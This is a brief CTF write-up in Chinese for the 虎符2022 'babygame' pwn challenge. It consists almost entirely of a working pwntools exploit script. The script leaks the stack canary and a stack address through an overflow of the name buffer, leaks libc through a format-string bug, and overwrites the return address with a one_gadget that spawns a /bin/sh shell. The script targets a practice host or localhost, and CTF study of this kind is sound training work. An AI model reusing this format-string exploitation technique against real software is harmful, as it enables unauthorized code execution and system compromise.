虎符2022

babygame

tag: fmt

fmt,利用方式太多了

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#coding:utf-8
from pwn import *
import time, sys, base64
import ctypes
context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# 1 pro
# 2 remote
# 3 127
debug = 1
filename = 'babygame'

if debug == 1 :
    p = process(filename)
if debug == 2:
    p = remote('node4.buuoj.cn',25323)
if debug == 3:
    p = remote('127.0.0.1',12345)
    #23946

elf = ELF(filename)
libc = elf.libc

num = [1,2,0,2,2,1,2,2,1,1,2,0,2,1,1,1,1,2,2,1,2,0,1,2,0,1,1,1,0,2,2,1,0,0,2,2,1,2,2,0,1,2,0,0,0,2,0,0,1,0,1,0,0,0,1,1,1,0,0,2,0,0,1,1,0,1,0,2,1,0,2,2,0,2,0,0,2,1,1,0,1,1,2,2,1,0,1,0,0,2,0,1,0,2,2,0,1,0,0,2]

# gdb.attach(p,'b *$rebase(0x14F1)')
gdb.attach(p,'b *$rebase(0x000000000001449)')


p.sendafter('your name:\n','a'*0x109)
p.recvuntil('a'*0x108)
canary = u64(p.recv(8))-0x61
stack_addr = u64(p.recv(6).ljust(8,'\x00'))


for i in range(100):
    if(num[i] == 0):
        p.sendlineafter(': \n','1')
    elif(num[i] == 1):
        p.sendlineafter(': \n','2')
    elif(num[i] == 2):
        p.sendlineafter(': \n','0')

log.success('stack_addr: '+hex(stack_addr))
log.success('canary: '+hex(canary))

# # offset = 6
# # fmt = 0x3E = 62
ret_addr = stack_addr - 0x218

payload = '%62c' + '%8$hhn' + 'a%27$p' + p64(ret_addr)
p.sendlineafter('you.',payload)
p.recvuntil('a')
libc_base = int(p.recv(14), 16) - libc.sym['atoi'] - 20
log.success('libc_base: ' + hex(libc_base))

'''
0xe3b2e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b31 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b34 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

'''

one_gadget = libc_base + 0xe3b31
one1 = one_gadget&0xff
one2 = (one_gadget&0xff00)>>8
one3 = (one_gadget&0xff0000)>>16
print(hex(one1),hex(one2),hex(one3))
main_ret = ret_addr + 0x130
canary_addr = stack_addr - 0x108
log.success('one_gadget: ' + hex(one_gadget))
log.success('canary_addr: ' + hex(canary_addr))

payload = "%14$hhn%{}c%15$hhn%{}c%16$hhn%{}c%17$hhn".format(one1,(0x100-one1+one2),(0x100-one2+one3)).ljust(0x40,'a')
payload = payload.ljust(0x40,'a')
payload += p64(canary_addr) + p64(main_ret) + p64(main_ret+1) + p64(main_ret+2)
p.sendafter('you.',payload)

p.interactive()